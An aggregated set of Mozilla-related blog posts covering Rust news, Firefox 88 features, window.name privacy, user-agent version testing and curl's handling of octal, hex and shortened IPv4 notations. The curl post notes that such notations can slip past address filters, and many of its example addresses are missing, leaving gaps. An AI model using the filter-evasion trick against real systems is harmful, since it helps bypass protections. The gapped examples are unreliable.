
Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

No new RFCs were proposed this week.

Upcoming Events


If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Grover GmbH

Massa Labs


Subspace Labs

Senior Software Engineer, Visualization


Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

We feel that Rust is now ready to join C as a practical language for implementing the [Linux] kernel. It can help us reduce the number of potential bugs and security vulnerabilities in privileged code while playing nicely with the core kernel and preserving its performance characteristics.

Wedson Almeida Filho on the Google Security Blog

Thanks to Jacob Pratt for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Talospace ProjectFirefox 88 on POWER

Firefox 88 is out. In addition to a bunch of new CSS properties, JavaScript is now supported in PDF files even within Firefox's own viewer, meaning there is no escape, and FTP is disabled, meaning you will need to use 78ESR (though you get two more weeks of ESR as a reprieve, since Firefox 89 has been delayed to allow UI code to further settle). I've long pondered doing a generic "cURL extension" that would reenable all sorts of protocols through a shim to either curl or libcurl; maybe it's time for it.

Fortunately Fx88 builds uneventfully as usual on OpenPOWER, though our PGO-LTO patches (apply to the tree with patch -p1) required a slight tweak to nsTerminator.cpp. Debug and optimized .mozconfigs are unchanged.

Also, an early milestone in the Firefox JavaScript JIT for OpenPOWER: Justin Hibbits merged my earlier jitpower work to a later tree (right now based on Firefox 86) and filled in the gaps with code from TenFourFox, and after some polishing up I did over the weekend, a JIT-enabled JavaScript shell now compiles on Fedora ppc64le. However, it immediately asserts, probably due to some missing definitions for register sets, and I'm sure there are many other assertions and lurking bugs to be fixed, but this is much further along than before. The fork is on Github for others who wish to contribute; I will probably decommission the old jitpower project soon since it is now superfluous. More to come.

The Mozilla BlogMark Surman joins the Mozilla Foundation Board of Directors

In early 2020, I outlined our efforts to expand Mozilla’s boards. Over the past year, we’ve added three new external Mozilla board members: Navrina Singh and Wambui Kinya to the Mozilla Foundation board and Laura Chambers to the Mozilla Corporation board.

Today, I’m excited to welcome Mark Surman, Executive Director of the Mozilla Foundation, to the Foundation board.

As I said to staff prior to his appointment, when I think about who should hold the keys to Mozilla, Mark is high on that list. Mark has unique qualifications in terms of the overall direction of Mozilla, how our organizations interoperate, and if and how we create programs, structures or organizations. Mark is joining the Mozilla Foundation board as an individual based on these qualifications; we have not made the decision that the Executive Director is automatically a member of the Board.

Mark has demonstrated his commitment to Mozilla as a whole, over and over. The whole of Mozilla figures into his strategic thinking. He’s got a good sense of how Mozilla Foundation and Mozilla Corporation can magnify or reduce the effectiveness of Mozilla overall. Mark has a hunger for Mozilla to grow in impact. He has demonstrated an ability to think big, and to dive into the work that is in front of us today.

For those of you who don’t know Mark already, he brings over two decades of experience leading projects and organizations focused on the public interest side of the internet. In the 12 years since Mark joined Mozilla, he has built the Foundation into a leading philanthropic and advocacy voice championing the health of the internet. Prior to Mozilla, Mark spent 15 years working on everything from a non-profit internet provider to an early open source content management system to a global network of community-run cybercafes. Currently, Mark spends most of his time on Mozilla’s efforts to promote trustworthy AI in the tech industry, a major focus of the Foundation’s current efforts.

Please join me in welcoming Mark Surman to the Mozilla Foundation Board of Directors.

You can read Mark’s message about why he’s joining Mozilla here.

PS. As always, we continue to look for new members for both boards, with the goal of adding the skills, networks and diversity Mozilla will need to succeed in the future.

LinkedIn: https://www.linkedin.com/in/msurman/

The post Mark Surman joins the Mozilla Foundation Board of Directors appeared first on The Mozilla Blog.

The Mozilla BlogWearing more (Mozilla) hats

Mark Surman

For many years now — and well before I sought out the job I have today — I thought: the world needs more organizations like Mozilla. Given the state of the internet, it needs them now. And, it will likely need them for a very long time to come.

Why? In part because the internet was founded with public benefit in mind. And, as the Mozilla Manifesto declared back in 2007, “… (m)agnifying the public benefit aspects of the internet is an important goal, worthy of time, attention and commitment.”

Today, this sort of ‘time and attention’ is more important — and urgent — than ever. We live in an era where the biggest companies in the world are internet companies. Much of what they have created is good, even delightful. Yet, as the last few years have shown, leaving things to commercial actors alone can leave the internet — and society — in a bit of a mess. We need organizations like Mozilla — and many more like it — if we are to find our way out of this mess. And we need these organizations to think big!

It’s for this reason that I’m excited to add another ‘hat’ to my work: I am joining the Mozilla Foundation board today. This is something I will take on in addition to my role as executive director.

Why am I assuming this additional role? I believe Mozilla can play a bigger role in the world than it does today. And, I also believe we can inspire and support the growth of more organizations that share Mozilla’s commitment to the public benefit side of the internet. Wearing a board member hat — and working with other Foundation and Corporation board members — I will be in a better position to turn more of my attention to Mozilla’s long term impact and sustainability.

What does this mean in practice? It means spending some of my time on big picture ‘Pan Mozilla’ questions. How can Mozilla connect to more startups, developers, designers and activists who are trying to build a better, more humane internet? What might Mozilla develop or do to support these people? How can we work with policy makers who are trying to write regulations to ensure the internet benefits the public interest? And, how do we shift our attention and resources outside of the US and Europe, where we have traditionally focused? While I don’t have answers to all these questions, I do know we urgently need to ask them — and that we need to do so in an expansive way that goes beyond the current scope of our operating organizations. That’s something I’ll be well positioned to do wearing my new board member hat.

Of course, I still have much to do wearing my executive director hat. We set out a few years ago to evolve the Foundation into a ‘movement building arm’ for Mozilla. Concretely, this has meant building up teams with skills in philanthropy and advocacy who can rally more people around the cause of a healthy internet. And, it has meant picking a topic to focus on: trustworthy AI. Our movement building approach — and our trustworthy AI agenda — is getting traction. Yet, there is still a way to go to unlock the kind of sustained action and impact that we want. Leading the day to day side of this work remains my main focus at Mozilla.

As I said at the start of this post: I think the world will need organizations like Mozilla for a long time to come. As all corners of our lives become digital, we will increasingly need to stand firm for public interest principles like keeping the internet open and accessible to all. While we can all do this as individuals, we also need strong, long lasting organizations that can take this stand in many places and over many decades. Whatever hat I’m wearing, I continue to be deeply committed to building Mozilla into a vast, diverse and sustainable institution to do exactly this.

The post Wearing more (Mozilla) hats appeared first on The Mozilla Blog.

Karl DubostGet Ready For Three Digits User Agent Strings

In 2022, Firefox and Chrome will reach a version number with three digits: 100. It's time to get ready and extensively test your code, so your code doesn't return null or, worse, 10 instead of 100.

Durian on sale

Some context

The browser user agent string is used in many circumstances: on the server side with the User-Agent HTTP header, and on the client side with navigator.userAgent. Browsers lie about it. Detection by web apps and websites does not cover all cases. So browsers have to modify the user agent string on a site-by-site basis.

Browser Release Calendars

According to the Firefox release calendar, during the first quarter of 2022 (probably February), Firefox will reach version 100.

And the Chrome release calendar currently sets March 29, 2022 as the date for Chrome 100.

What Is the Mozilla Webcompat Team Doing?

Dennis Schubert started to test JavaScript libraries, but this only tests the libraries that are up to date. And as we know, the Web is a legacy machine full of history.

The webcompat team will probably automatically test the top 1000 websites. But this is very rudimentary. It will not cover everything. Sites always break in strange ways.

What Can You Do To Help?

Browse the Web with a 100 UA string

  1. Change the user agent string of your favorite browser. For example, if the string is Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0, change it to be Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
  2. If you notice something that is breaking because of the UA string, file a report on webcompat. Do not forget to check that it is working with the normal UA string.
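The override string in step 1 can also be generated programmatically, for example when preparing test profiles. A minimal sketch; the helper name is invented for this example:

```javascript
// Hypothetical helper: rewrite the "rv:" and "Firefox/" (or "Chrome/")
// version tokens in a user agent string to 100.0, for use as an override.
function bumpToVersion100(ua) {
  return ua.replace(/(Firefox|Chrome|rv:)(\/?)(\d+)\.0/g, "$1$2100.0");
}

const ua =
  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0";
console.log(bumpToVersion100(ua));
// "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0"
```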

Automatic tests for your code

If your web app has a JavaScript Test suite, add a profile with a browser having 100 for its version number and check if it breaks. Test both Firefox and Chrome (mobile and desktop) because the libraries have different code paths depending on the user agent. Watch out for code like:

const ua_string = "Firefox/100.0";
ua_string.match(/Firefox\/(\d\d)/); //  ["Firefox/10", "10"]
ua_string.match(/Firefox\/(\d{2})/); // ["Firefox/10", "10"]
ua_string.match(/Firefox\/(\d\d)\./); //  null
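By contrast, a quantifier that accepts one or more digits keeps working once versions reach three digits:

```javascript
const ua_string = "Firefox/100.0";
// \d+ matches one or more digits, so it survives the jump to version 100.
ua_string.match(/Firefox\/(\d+)\./); // ["Firefox/100.", "100"]
```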

Compare version numbers as integers, not strings

Compare integers, not strings, once you have decided on a minimum version for supporting a browser, because:

"80" < "99" // true
"80" < "100" // false
parseInt("80", 10) < parseInt("99", 10) // true
parseInt("80", 10) < parseInt("100", 10) // true
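Putting the two ideas together, here is a small sketch of a version gate; the helper name is made up for this example:

```javascript
// Hypothetical helper: pull the Firefox major version out of a UA string
// and return it as a number, or null if it isn't found.
function majorVersion(ua) {
  const match = ua.match(/Firefox\/(\d+)/);
  return match ? parseInt(match[1], 10) : null;
}

const MIN_SUPPORTED = 80;
const major = majorVersion(
  "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0");
console.log(major);                  // 100
console.log(major >= MIN_SUPPORTED); // true, because we compare numbers, not strings
```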


If you have more questions, things I may have missed, or a different take on them, feel free to comment… Be mindful.


Mozilla Privacy BlogMozilla Mornings on the DSA: Setting the standard for third-party platform auditing

On 11 May, Mozilla will host the next instalment of Mozilla Mornings – our regular event series that brings together policy experts, policymakers and practitioners for insight and discussion on the latest EU digital policy developments.

This instalment will focus on the DSA’s provisions on third-party platform auditing, one of the stand-out features of its next-generation regulatory approach. We’re bringing together a panel of experts to unpack the provisions’ strengths and shortcomings; and to provide recommendations for how the DSA can build a standard-setting auditing regime for Very Large Online Platforms.


Alexandra Geese MEP
IMCO DSA shadow rapporteur
Group of the Greens/European Free Alliance

Amba Kak
Director of Global Programs and Policy
AI Now Institute

Dr Ben Wagner
Assistant Professor, Faculty of Technology, Policy and Management
TU Delft  

With opening remarks by Raegan MacDonald
Director of Global Public Policy

Moderated by Jennifer Baker
EU technology journalist


Logistical details

Tuesday 11 May, 14:00 – 15:00 CEST

Zoom Webinar

Register *here*

Webinar login details to be shared on day of event

The post Mozilla Mornings on the DSA: Setting the standard for third-party platform auditing appeared first on Open Policy & Advocacy.

Hacks.Mozilla.OrgNever too late for Firefox 88

April is upon us, and we have a most timely release for you — Firefox 88. In this release you will find a bunch of nice CSS additions including :user-valid and :user-invalid support and image-set() support, support for regular expression match indices, removal of FTP protocol support for enhanced security, and more!

This blog post provides merely a set of highlights; for all the details, check out the following:

:user-valid and :user-invalid

There are a large number of HTML form-related pseudo-classes that allow us to specify styles for various data validity states, as you’ll see in our UI pseudo-classes tutorial. Firefox 88 introduces two more — :user-valid and :user-invalid.

You might be thinking “we already have :valid and :invalid for styling forms containing valid or invalid data — what’s the difference here?”

:user-valid and :user-invalid are similar, but have been designed with better user experience in mind. They effectively do the same thing — matching a form input that contains valid or invalid data — but :user-valid and :user-invalid only start matching after the user has stopped focusing on the element (e.g. by tabbing to the next input). This is a subtle but useful change, which we will now demonstrate.

Take our valid-invalid.html example. This uses the following CSS to provide clear indicators as to which fields contain valid and invalid data:

input:invalid {
  border: 2px solid red;
}

input:invalid + span::before {
  content: '✖';
  color: red;
}

input:valid + span::before {
  content: '✓';
  color: green;
}

The problem with this is shown when you try to enter data into the “E-mail address” field — as soon as you start typing an email address into the field the invalid styling kicks in, and remains right up until the point where the entered text constitutes a valid e-mail address. This experience can be a bit jarring, making the user think they are doing something wrong when they aren’t.

Now consider our user-valid-invalid.html example. This includes nearly the same CSS, except that it uses the newer :user-valid and :user-invalid pseudo-classes:

input:user-invalid {
  border: 2px solid red;
}

input:user-invalid + span::before {
  content: '✖';
  color: red;
}

input:user-valid + span::before {
  content: '✓';
  color: green;
}

In this example the valid/invalid styling only kicks in when the user has entered their value and removed focus from the input, giving them a chance to enter their complete value before receiving feedback. Much better!

Note: Prior to Firefox 88, the same effect could be achieved using the proprietary :-moz-ui-invalid and :-moz-ui-valid pseudo-classes.

image-set() support for content/cursor

The image-set() function provides a mechanism in CSS to allow the browser to pick the most suitable image for the device’s resolution from a list of options, in a similar manner to the HTML srcset attribute. For example, the following can be used to provide multiple background-images to choose from:

div {
  background-image: image-set(
    url("small-balloons.jpg") 1x,
    url("large-balloons.jpg") 2x);
}

Firefox 88 has added support for image-set() as a value of the content and cursor properties. So for example, you could provide multiple resolutions for generated content:

h2::before {
  content: image-set(
    url("small-icon.jpg") 1x,
    url("large-icon.jpg") 2x);
}

or custom cursors:

div {
  cursor: image-set(
    url("custom-cursor-small.png") 1x,
    url("custom-cursor-large.png") 2x), auto;
}

outline now follows border-radius shape

The outline CSS property has been updated so that it now follows the shape created by border-radius. It is really nice to see a fix included in Firefox for this long-standing problem. As part of this work the non-standard -moz-outline-radius property has been removed.

RegExp match indices

Firefox 88 supports the match indices feature of regular expressions, which makes an indices property available containing an array that stores the start and end positions of each matched capture group. This functionality is enabled using the d flag.

There is also a corresponding hasIndices boolean property that allows you to check whether a regex has this mode enabled.

So for example:

const regex1 = new RegExp('foo', 'd');
regex1.hasIndices // true
const test = regex1.exec('foo bar');
test // [ "foo" ]
test.indices // [ [ 0, 3 ] ]
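The indices array also covers capture groups, which is where the feature really pays off. A sketch (not from the original post) that locates a version number and its exact position:

```javascript
// With the d flag, indices[0] is the span of the whole match and
// indices[n] is the span of capture group n.
const regex = /Firefox\/(\d+)\.(\d+)/d;
const result = regex.exec("Firefox/100.0");
result.indices; // [ [0, 13], [8, 11], [12, 13] ]
// [0, 13] is the whole match, [8, 11] is "100", [12, 13] is "0"
```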

For more useful information, see our RegExp.prototype.exec() page, and RegExp match indices on the V8 dev blog.

FTP support disabled

FTP support has been disabled from Firefox 88 onwards, and its full removal is (currently) planned for Firefox version 90. Addressing this security risk reduces the likelihood of an attack while also removing support for a non-encrypted protocol.

Complementing this change, the extension setting browserSettings.ftpProtocolEnabled has been made read-only, and web extensions can now register themselves as protocol handlers for FTP.
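For instance, an extension could declare itself as an FTP handler in its manifest.json via the existing protocol_handlers key. This excerpt is a hypothetical sketch; the bridge name and URL are invented:

```json
{
  "protocol_handlers": [
    {
      "protocol": "ftp",
      "name": "Hypothetical FTP bridge",
      "uriTemplate": "https://ftp-bridge.example.com/?uri=%s"
    }
  ]
}
```

When the user opens an ftp:// link, the browser can then hand the URL off to the registered handler in place of the removed built-in support.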

The post Never too late for Firefox 88 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Addons BlogChanges to themeable areas of Firefox in version 89

Firefox’s visual appearance will be updated in version 89 to provide a cleaner, modernized interface. Since some of the changes will affect themeable areas of the browser, we wanted to give theme artists a preview of what to expect as the appearance of their themes may change when applied to version 89.

Tabs appearance

  • The property tab_background_separator, which controls the appearance of the vertical lines that separate tabs, will no longer be supported.
  • Currently, the tab_line property can set the color of an active tab’s thick top border. In Firefox 89, this property will set a color for all borders of an active tab, and the borders will be thinner.

URL and toolbar

  • The property toolbar_field_separator, which controls the color of the vertical line that separates the URL bar from the three-dot “meatball menu,” will no longer be supported.

  • The property toolbar_vertical_separator, which controls the vertical lines near the three-line “hamburger menu” and the line separating items in the bookmarks toolbar, will no longer appear next to the hamburger menu. You can still use this property to control the separators in the bookmarks toolbar.  (Note: users will need to enable the separator by right clicking on the bookmarks toolbar and selecting “Add Separator.”)

You can use the Nightly pre-release channel to start testing how your themes will look with Firefox 89. If you’d like to get more involved testing other changes planned for this release, please check out our foxfooding campaign, which runs until May 3, 2021.

Firefox 89 is currently set to be available on the Beta pre-release channel by April 23, 2021, and released on June 1, 2021.

As always, please post on our community forum if there are any questions.

The post Changes to themeable areas of Firefox in version 89 appeared first on Mozilla Add-ons Blog.

Daniel StenbergMars 2020 Helicopter Contributor

Friends of mine know that I’ve tried for a long time to get confirmation that curl is used in space. We’ve believed it to be likely but I’ve wanted to get a clear confirmation that this is indeed the fact.

Today GitHub posted their article about open source in the Mars mission, and they now provide a badge on their site for contributors of projects that are used in that mission.

I have one of those badges now. Only a few others of the current 879 recorded curl authors got it. This seems to be because the mission used a very old curl release (curl 7.19, released in September 2008), and because GitHub couldn’t match all contributors with emails, or the authors didn’t have their emails verified on GitHub, etc.

According to that GitHub blog post, we are “almost 12,000” developers who got it.

While this strictly speaking doesn’t say that curl is actually used in space, I think it can probably be assumed to be.

Here’s the interplanetary curl development displayed in a single graph:

See also: screenshotted curl credits and curl supports NASA.


Image by Aynur Zakirov from Pixabay

Mozilla Security BlogFirefox 88 combats window.name privacy abuses

We are pleased to announce that Firefox 88 is introducing a new protection against privacy leaks on the web. Under new limitations imposed by Firefox, trackers are no longer able to abuse the window.name property to track users across websites.

Since the late 1990s, web browsers have made the window.name property available to web pages as a place to store data. Unfortunately, data stored in window.name has been allowed by standard browser rules to leak between websites, enabling trackers to identify users or snoop on their browsing history. To close this leak, Firefox now confines the window.name property to the website that created it.

Leaking data through window.name

The window.name property of a window allows hyperlinks and forms to target that window by name when navigating. The window.name property, available to any website you visit, is a “bucket” for storing any data the website may choose to place there. Historically, the data stored in window.name has been exempt from the same-origin policy enforced by browsers that prohibited some forms of data sharing between websites. Unfortunately, this meant that data stored in the window.name property was allowed by all major browsers to persist across page visits in the same tab, allowing different websites you visit to share data about you.

For example, suppose a page at https://example.com/ set the window.name property to “my-identity@email.com”. Traditionally, this information would persist even after you clicked on a link and navigated to https://malicious.com/. So the page at https://malicious.com/ would be able to read the information without your knowledge or consent:

Window.name persists across the cross-origin navigation.


Tracking companies have been abusing this property to leak information, and have effectively turned it into a communication channel for transporting data between websites. Worse, malicious sites have been able to observe the content of window.name to gather private user data that was inadvertently leaked by another website.
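As a minimal sketch of the leak described above (a plain object stands in for a browser tab here, since window.name itself only exists in a browser):

```javascript
// Minimal simulation of the pre-Firefox-88 leak. A plain object stands
// in for the browser tab; in a real page you would use window.name.
const tab = { name: "" };

// On https://example.com/ a script stores an identifier:
tab.name = "my-identity@email.com";

// The user clicks a link to https://malicious.com/ in the same tab.
// Historically the value persisted, so the new site could read it:
console.log(tab.name); // "my-identity@email.com"

// Firefox 88 instead clears the property on cross-site navigation,
// so the next site sees an empty string:
tab.name = "";
console.log(tab.name); // ""
```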

Clearing window.name to prevent leakage

To prevent the potential privacy leakage of window.name, Firefox will now clear the window.name property when you navigate between websites. Here’s how it looks:

Firefox 88 clearing window.name after cross-origin navigation.


Firefox will attempt to identify likely non-harmful usage of window.name and avoid clearing the property in such cases. Specifically, Firefox only clears window.name if the link being clicked does not open a pop-up window.

To avoid unnecessary breakage, if a user navigates back to a previous website, Firefox now restores the window.name property to its previous value for that website. Together, these dual rules for clearing and restoring window.name data effectively confine that data to the website where it was originally created, similar to how Firefox’s Total Cookie Protection confines cookies to the website where they were created. This confinement is essential for preventing malicious sites from abusing window.name to gather users’ personal data.

Firefox isn’t alone in making this change: web developers relying on window.name should note that Safari is also clearing the window.name property, and Chromium-based browsers are planning to do so. Going forward, developers should expect clearing to be the new standard way that browsers handle window.name.

If you are a Firefox user, you don’t have to do anything to benefit from this new privacy protection. As soon as your Firefox auto-updates to version 88, the new default window.name data confinement will be in effect for every website you visit. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect your privacy.

The post Firefox 88 combats window.name privacy abuses appeared first on Mozilla Security Blog.

Daniel Stenbergcurl those funny IPv4 addresses

Everyone knows that on most systems you can specify IPv4 addresses as just 4 decimal numbers separated with periods (dots). Example:

Useful when you for example want to ping your local wifi router and similar. “ping”

Other bases

The IPv4 string is usually parsed by the inet_addr() function or at times it is passed straight into the name resolver function like getaddrinfo().

This address parser supports more ways to specify the address. You can for example specify each number using either octal or hexadecimal.

Write the numbers with zero-prefixes to have them interpreted as octal numbers:


Write them with 0x-prefixes to specify them in hexadecimal:


You will find that ping can deal with all of these.
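As an illustrative sketch (my own code, not the actual inet_addr() implementation), each number is interpreted according to its prefix:

```javascript
// Interpret one "quad" the way the classic parser does: a 0x prefix
// means hexadecimal, a leading zero means octal, anything else decimal.
function parseQuad(s) {
  if (/^0x/i.test(s)) return parseInt(s, 16); // hex: "0x7f"
  if (/^0./.test(s)) return parseInt(s, 8);   // octal: "0177"
  return parseInt(s, 10);                     // decimal: "127"
}
console.log(parseQuad("0177")); // 127
console.log(parseQuad("0x7f")); // 127
console.log(parseQuad("127"));  // 127
```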

As a 32 bit number

An IPv4 address is a 32 bit number that, when written as 4 separate numbers, is split into 4 parts with 8 bits represented in each number. Each separate number in “a.b.c.d” is 8 bits that combined make up the whole 32 bits. Sometimes the four parts are called quads.
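That split can be sketched in a few lines (illustrative code, using 127.0.0.1 as the example address):

```javascript
// Pack the four 8-bit quads of a.b.c.d into one unsigned 32 bit
// number, and unpack it again.
function quadsToU32(a, b, c, d) {
  return ((a << 24) | (b << 16) | (c << 8) | d) >>> 0;
}
function u32ToQuads(n) {
  return [24, 16, 8, 0].map(s => (n >>> s) & 0xFF).join(".");
}
console.log(quadsToU32(127, 0, 0, 1)); // 2130706433
console.log(u32ToQuads(2130706433));   // "127.0.0.1"
```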

The typical IPv4 address parser however handles more ways than just the 4-way split. It can also deal with the address when specified as one, two or three numbers (separated with dots unless it’s just one).

If given as a single number, it treats it as a single unsigned 32 bit number. The top-most eight bits store what we “normally” write as the first number, and so on. The address shown above, if we keep it as hexadecimal, would then become:


And you can of course write it in octal as well:


and plain old decimal:


As two numbers

If you instead write the IP address as two numbers with a dot in between, the first number is assumed to be 8 bits and the next one a 24 bit one. And you can keep on mixing the bases as you like. The same address again, now in a hexadecimal + octal combo:


This allows for some fun shortcuts when the 24 bit number contains a lot of zeroes. Like you can shorten “” to just “127.1” and it still works and is perfectly legal.
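The expansion of the two-number form can be sketched like this (illustrative code, not curl’s actual parser):

```javascript
// "a.b": a is the top 8 bits, b supplies the remaining 24 bits,
// so 127.1 expands to 127.0.0.1.
function twoPartToQuads(a, b) {
  return [a & 0xFF, (b >>> 16) & 0xFF, (b >>> 8) & 0xFF, b & 0xFF].join(".");
}
console.log(twoPartToQuads(127, 1)); // "127.0.0.1"
```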

As three numbers

Now the parts are supposed to be split up in bits like this: 8.8.16. Here’s the example address again in octal, hex and decimal:
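Sketched the same way (again my own illustrative code), the three-number 8.8.16 split looks like:

```javascript
// "a.b.c": 8 bits, 8 bits, then a 16 bit tail,
// so 127.0.1 expands to 127.0.0.1.
function threePartToQuads(a, b, c) {
  return [a & 0xFF, b & 0xFF, (c >>> 8) & 0xFF, c & 0xFF].join(".");
}
console.log(threePartToQuads(127, 0, 1)); // "127.0.0.1"
```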


Bypassing filters

All of these versions shown above work with most tools that accept IPv4 addresses and sometimes you can bypass filters and protection systems by switching to another format so that you don’t match the filters. It has previously caused problems in node and perl packages and I’m guessing numerous others. It’s a feature that is often forgotten, ignored or just not known.

It begs the question why this very liberal support was once added and allowed but I’ve not been able to figure that out – maybe because of how it matches class A/B/C networks. The support for this syntax seems to have been introduced with the inet_aton() function in the 4.2BSD release in 1983.

IPv4 in URLs

URLs have a host name in them and it can be specified as an IPv4 address.

RFC 3986

The RFC 3986 URL specification’s section 3.2.2 says an IPv4 address must be specified as:

dec-octet "." dec-octet "." dec-octet "." dec-octet

… but in reality very few clients that accept such URLs actually restrict the addresses to that format. I believe mostly because many programs will pass on the host name to a name resolving function that itself will handle the other formats.


The Host Parsing section of the WHATWG URL specification allows the many variations of IPv4 addresses. (If you’re anything like me, you might need to read that spec section about three times or so before it’s clear.)

Since the browsers all obey this spec, it’s no surprise that they all allow this kind of IP number in URLs they handle.

curl before

curl has traditionally been in the camp that mostly accidentally supported the “flexible” IPv4 address formats. It did this because if you built curl to use the system resolver functions (which it does by default), those system functions would handle these formats for curl. If curl was built to use c-ares (which is one of curl’s optional name resolver backends), using such address formats just made the transfer fail.

The drawback with allowing the system resolver functions to deal with the formats is that curl itself then works with the original formatted host name so things like HTTPS server certificate verification and sending Host: headers in HTTP don’t really work the way you’d want.

curl now

Starting in curl 7.77.0 (since this commit) curl will “natively” understand these IPv4 formats and normalize them itself.

There are several benefits of doing this ourselves:

  1. Applications using the URL API will get the normalized host name out.
  2. curl works the same independently of the selected name resolver backend.
  3. HTTPS works fine even when the address is given in other formats.
  4. HTTP virtual host headers get the “correct” formatted host name.

Fun example command line to see if it works:

curl -L 16843009

16843009 gets normalized to which then gets used as (because curl will assume HTTP for this URL when no scheme is used) which returns a 301 redirect over to which -L makes curl follow…
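The arithmetic behind that normalization is the single-number rule from earlier, sketched here illustratively:

```javascript
// 16843009 is 0x01010101: each byte is 1, so the dotted-quad form
// is 1.1.1.1.
function u32ToQuads(n) {
  return [24, 16, 8, 0].map(s => (n >>> s) & 0xFF).join(".");
}
console.log(u32ToQuads(16843009)); // "1.1.1.1"
```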


Image from Pixabay

Niko MatsakisAsync Vision Doc Writing Sessions VI

Ryan Levick and I are going to be hosting more Async Vision Doc Writing Sessions this week. We’re not organized enough to have assigned topics yet, so I’m just going to post the dates/times and we’ll be tweeting about the particular topics as we go.

When Who
Wed at 07:00 ET Ryan
Wed at 15:00 ET Niko
Fri at 07:00 ET Ryan
Fri at 14:00 ET Niko

If you’ve joined before, we’ll be re-using the same Zoom link. If you haven’t joined, then send a private message to one of us and we’ll share the link. Hope to see you there!

Cameron KaiserTenFourFox FPR32 available, plus a two-week reprieve

TenFourFox Feature Parity Release 32 final is now available for testing (downloads, hashes, release notes). This adds an additional entry to the ATSUI font blocklist and completes the outstanding security patches. Assuming no issues, it will go live as the final FPR on or about April 19.

Mozilla is advancing Firefox 89 by two weeks to give them additional time to polish up the UI changes in that version. This will thus put all future release dates ahead by two weeks as well; the next ESR release and the first Security Parity Release parallel with it will instead be scheduled for June 1. Aligning with this, the testing version of FPR32 SPR1 will come out the weekend before June 1 and the final official build of TenFourFox will also move ahead two weeks, from September 7 to September 21. After that you'll have to DIY, but fortunately it already looks like people are rising to the challenge of building the browser themselves: I have been pointed to an installer which neatly wraps up all the necessary build prerequisites, provides a guided Automator workflow and won't interfere with any existing installation of MacPorts. I don't have anything to do with this effort and can't attest to or advise on its use, but it's nice to see it exists, so download it from Macintosh Garden if you want to try it out. Remember, compilation speed on G4 (and, shudder, G3) systems can be substantially slower than on a G5, especially without multiple CPUs. Given that this Quad G5 running full tilt (three cores dedicated to compiling) with a full 16GB of RAM takes about three and a half hours to kick out a single-architecture build, you should plan accordingly for longer times on lesser systems.

I have already started clearing issues from Github I don't intend to address. The remaining issues may not necessarily be addressed either, and definitely won't be during the security parity period, but they are considerations for things I might need later. Don't add to this list: I will mark new issues without patches or PRs as invalid. I will also be working on revised documentation for Tenderapp and the main site so people are aware of the forthcoming plan; those changes will be posted sometime this coming week.

Hacks.Mozilla.OrgQUIC and HTTP/3 Support now in Firefox Nightly and Beta

tl;dr: Support for QUIC and HTTP/3 is now enabled by default in Firefox Nightly and Firefox Beta. We are planning to start the rollout in Firefox Release 88. HTTP/3 will be available by default by the end of May.

What is HTTP/3?

HTTP/3 is a new version of HTTP (the protocol that powers the Web) that is based on QUIC. HTTP/3 has three main performance improvements over HTTP/2:

  • Because it is based on UDP, it takes less time to connect;
  • It does not have head of line blocking, where delays in delivering packets cause an entire connection to be delayed; and
  • It is better able to detect and repair packet loss.

QUIC also provides connection migration and other features that should improve performance and reliability. For more on QUIC, see this excellent blog post from Cloudflare.

How to use it?

Firefox Nightly and Firefox Beta will automatically try to use HTTP/3 if offered by the Web server (for instance, Google or Facebook). Web servers can indicate support by using the Alt-Svc response header or by advertising HTTP/3 support with a HTTPS DNS record. Both the client and server must support the same QUIC and HTTP/3 draft version to connect with each other. For example, Firefox currently supports drafts 27 to 32 of the specification, so the server must report support of one of these versions (e.g., “h3-32”) in Alt-Svc or HTTPS record for Firefox to try to use QUIC and HTTP/3 with that server. When visiting such a website, viewing the network request information in Dev Tools should show the Alt-Svc header, and also indicate that HTTP/3 was used.
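For instance, a server that supports draft 32 on UDP port 443 could advertise it with a response header along these lines (illustrative values; the header syntax is defined in RFC 7838):

```
Alt-Svc: h3-32=":443"; ma=86400
```

Here ma is the number of seconds the client may cache this advertisement.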

If you encounter issues with these or other sites, please file a bug in Bugzilla.

The post QUIC and HTTP/3 Support now in Firefox Nightly and Beta appeared first on Mozilla Hacks - the Web developer blog.

About:CommunityNew Contributors To Firefox

With Firefox 88 in flight, we are pleased to welcome the long list of developers who’ve contributed their first code change to Firefox in this release, 24 of whom were brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

Mozilla Localization (L10N)L10n Report: April 2021 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 


New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

  • Cebuano (ceb)
  • Hiligaynon (hil)
  • Meiteilon (mni)
  • Papiamento (pap-AW)
  • Shilha (shi)
  • Somali (so)
  • Uyghur (ug)

Update on the communication channels

On April 3rd, as part of a broader strategy change at Mozilla, we moved our existing mailing lists (dev-l10n, dev-l10n-web, dev-l10n-new-locales) to Discourse. If you are involved in localization, please make sure to create an account on Discourse and set up your profile to receive notifications when there are new messages in the Localization category.

We also decided to shut down our existing Telegram channel dedicated to localization. This was originally created to fill a gap, given its broad availability on mobile, and the steep entry barrier required to use IRC. In the meantime, IRC has been replaced by chat.mozilla.org, which offers a much better experience on mobile platforms. Please make sure to check out the dedicated Wiki page with instructions on how to connect, and join our #l10n-community room.

New content and projects

What’s new or coming up in Firefox desktop

